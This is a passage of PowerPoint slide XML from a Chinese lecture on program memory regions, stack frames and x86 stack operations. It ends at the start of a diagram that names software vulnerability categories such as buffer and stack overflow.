            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    由编译器在需要的时候分配，用完自动清除的变量的存储区，如：局部变量、函数参数等</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>堆</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>分配的内存块，一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>对应一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>delete</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>自由存储区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>由</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>等分配的内存块，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>来释放内存</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>全局</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>静态存储区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>被分配到同一块内存中，全局变量又分为初始化的和未初始化的</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>常量存储区</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>存放的是常量，不允许修改（当然，通过非正当手段也可以修改）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>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堆与栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="368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dirty="0"/>
              <a:t>现代计算机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>串行执行机制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，都直</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接在代码底层支持栈的数据结构</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>这体现在，有专门的寄存器指向栈所在的地址，有专门的机器指令完成数据入栈出栈的操作。这种机制的特点是效率高，支持的数据有限，一般是整数，指针，浮点数等系统直接支持的数据类型，并不直接支持其他的数据结构</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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堆与栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378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dirty="0"/>
              <a:t>对子程序的调用就是直接利用栈完</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>成的。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>机器的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>指令里</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>隐含</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>了把返回地址推入栈，然后跳转至子程序地址的操作，而子程序中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>指令则隐含从堆栈中弹出返回地址并跳转之的操作。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>C/C++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>中的自动变量是直接利用栈的例子，这也就是为什么当函数返回时，该函数的自动变量自动失效的原因</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200"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堆与栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="389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sz="2800" dirty="0"/>
              <a:t>和栈不同，堆的数据结构并不是由系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>无论是机</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>器系统还是操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>支持的，而是由函数库提供</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>基本的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>realloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>/free </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>函数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>当程序使用这些函数去获得新的内存空间时，这套函数首先试图从内部堆中寻找可用的内存空间，如果没有可以使用的内存空间，则试图利用系统调用来动态增加程序数据段的内存大小，新分配得到的空间首先被组织进内部堆中去，然后再以适当的形式返回给调用者</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>程序释放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>这片内存空间被返回内部堆结构中，可能会被适当的处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>比如和其他空闲空间合并成更大的空闲空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>，以更适合下一次内存分配申请</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堆与栈</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="399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区别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>栈是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提供的功能，特点是快速高效，缺点是有限制，数据不灵活；而堆是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>函数库</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>提供的功能，特点是灵活方便，数据适应面广泛，但是效率有一定降低</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>栈是系统数据结构，对于进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>线程是唯一的；堆是函数库内部数据结构，不一定唯一。不同堆分配的内存无法互相操作</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>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栈帧</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307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定义</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>操作系统为进程中的每个函数调用都划分了一个栈帧空间，每个栈帧都是一个独立的栈结构，而系统栈则是这些函数调用栈帧的集合</a:t>
            </a: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栈帧信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="317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a:t>局部变量：为函数中局部变量开辟的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>栈帧状态值：保存前栈帧的底部，用于在函数调用结束后恢复调用者函数的栈帧</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>函数返回地址：保存当前函数调用前的“断点”信息，即函数调用指令的后面一条指令的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>函数的调用参数</a:t>
            </a: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栈操作</a:t>
            </a:r>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indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800"/>
              <a:t>栈是一块连续的内存空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>先入后出</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>生长方向与内存的生长方向正好相反</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>从高地址向低地址生长</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>每一个线程有自己的栈</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>提供一个暂时存放数据的区域 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>POP/PUSH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>指令来对栈进行操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-457200" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>寄存器指向栈顶，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400"/>
              <a:t>EBP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400"/>
              <a:t>指向栈底</a:t>
            </a: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栈操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="419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3200"/>
              <a:t>Intel x86</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>上的栈被认为是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反向</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>的，即意味着栈向下增长。当一个信息被压入栈，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>减少，新元素被写入目标地址。当一个信息被弹出时，则从</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>指针所指向的地址中读出一个元素，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>ESP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>增加，移向上边的边界并压缩栈。这样，当说一个元素被放置在栈的顶端时，它实际上被写在所有先进入栈元素的下面</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软件漏洞的分类</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143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4" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="2435225"/>
            <a:ext cx="1582737" cy="5508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1">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="144000" tIns="72000" rIns="144000" bIns="108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sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2876550" y="1700213"/>
            <a:ext cx="1573213" cy="8318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缓冲区溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="684213" y="4956175"/>
            <a:ext cx="1503362" cy="9191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1">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="lt1"/>
          </a:fontRef>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="144000" tIns="72000" rIns="144000" bIns="108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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="楷体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全策略漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="24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Box 22"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="1136650"/>
            <a:ext cx="2124075" cy="461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栈溢出漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5080000" y="1590675"/>
